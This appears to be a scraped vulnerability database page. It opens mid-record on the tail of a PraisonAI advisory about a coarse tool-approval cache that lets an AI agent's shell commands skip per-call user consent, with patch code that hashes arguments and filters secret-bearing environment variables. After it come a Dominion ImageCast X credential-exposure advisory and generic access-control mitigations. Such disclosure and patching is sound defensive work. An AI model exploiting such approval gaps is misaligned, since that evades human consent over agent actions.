-\u003e None:\n    approved = self._approved_context.get(set())\n    risk = self._risk_levels.get(tool_name)\n    if risk == \"critical\" and arguments:\n        key = f\"{tool_name}:{hashlib.sha256(json.dumps(arguments, sort_keys=True).encode()).hexdigest()}\"\n    else:\n        key = tool_name\n    approved.add(key)\n    self._approved_context.set(approved)\n\ndef is_already_approved(self, tool_name: str, arguments: dict = None) -\u003e bool:\n    approved = self._approved_context.get(set())\n    risk = self._risk_levels.get(tool_name)\n    if risk == \"critical\" and arguments:\n        key = f\"{tool_name}:{hashlib.sha256(json.dumps(arguments, sort_keys=True).encode()).hexdigest()}\"\n        return key in approved\n    return tool_name in approved\n```\n\n2. **Filter environment variables** in `shell_tools.py`:\n\n```python\nSENSITIVE_PATTERNS = (\u0027_KEY\u0027, \u0027_SECRET\u0027, \u0027_TOKEN\u0027, \u0027_PASSWORD\u0027, \u0027_CREDENTIAL\u0027)\n\nprocess_env = {\n    k: v for k, v in os.environ.items()\n    if not any(p in k.upper() for p in SENSITIVE_PATTERNS)\n}\nif env:\n    process_env.update(env)\n```",
  "id": "GHSA-ffp3-3562-8cv3",
  "modified": "2026-06-19T21:33:09Z",
  "published": "2026-04-10T19:28:38Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-ffp3-3562-8cv3"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-56074"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/MervinPraison/PraisonAI"
    },
    {
      "type": "WEB",
      "url": "https://github.com/MervinPraison/PraisonAI/releases/tag/v4.5.128"
    },
    {
      "type": "WEB",
      "url": "https://www.vulncheck.com/advisories/praisonai-tool-approval-cache-bypass-via-coarse-grained-caching"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "PraisonAI: Coarse-Grained Tool Approval Cache Bypasses Per-Invocation Consent for Shell Commands"
}

GHSA-FFQC-R4J7-PVVM

Vulnerability from github – Published: 2022-06-25 00:00 – Updated: 2022-07-07 00:00
VLAI
Details

The authentication mechanism used by poll workers to administer voting using the tested version of Dominion Voting Systems ImageCast X can expose cryptographic secrets used to protect election information. An attacker could leverage this vulnerability to gain access to sensitive information and perform privileged actions, potentially affecting other election equipment.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2022-1746"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-266",
      "CWE-269",
      "CWE-863"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2022-06-24T15:15:00Z",
    "severity": "HIGH"
  },
  "details": "The authentication mechanism used by poll workers to administer voting using the tested version of Dominion Voting Systems ImageCast X can expose cryptographic secrets used to protect election information. An attacker could leverage this vulnerability to gain access to sensitive information and perform privileged actions, potentially affecting other election equipment.",
  "id": "GHSA-ffqc-r4j7-pvvm",
  "modified": "2022-07-07T00:00:29Z",
  "published": "2022-06-25T00:00:53Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-1746"
    },
    {
      "type": "WEB",
      "url": "https://www.cisa.gov/uscert/ics/advisories/icsa-22-154-01"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

Mitigation
Architecture and Design
  • Divide the product into anonymous, normal, privileged, and administrative areas. Reduce the attack surface by carefully mapping roles with data and functionality. Use role-based access control (RBAC) [REF-229] to enforce the roles at the appropriate boundaries.
  • Note that this approach may not protect against horizontal authorization, i.e., it will not protect a user from attacking others with the same role.
Mitigation
Architecture and Design

Ensure that access control checks are performed related to the business logic. These checks may be different than the access control checks that are applied to more generic resources such as files, connections, processes, memory, and database records. For example, a database may restrict access for medical records to a specific database user, but each record might only be intended to be accessible to the patient and the patient's doctor [REF-7].

Mitigation MIT-4.4
Architecture and Design

Strategy: Libraries or Frameworks

  • Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.
  • For example, consider using authorization frameworks such as the JAAS Authorization Framework [REF-233] and the OWASP ESAPI Access Control feature [REF-45].
Mitigation
Architecture and Design
  • For web applications, make sure that the access control mechanism is enforced correctly at the server side on every page. Users should not be able to access any unauthorized functionality or information by simply requesting direct access to that page.
  • One way to do this is to ensure that all pages containing sensitive information are not cached, and that all such pages restrict access to requests that are accompanied by an active and authenticated session token associated with a user who has the required permissions to access that page.
Mitigation
System Configuration Installation

Use the access control capabilities of your operating system and server environment and define your access control lists accordingly. Use a "default deny" policy when defining these ACLs.

No CAPEC attack patterns related to this CWE.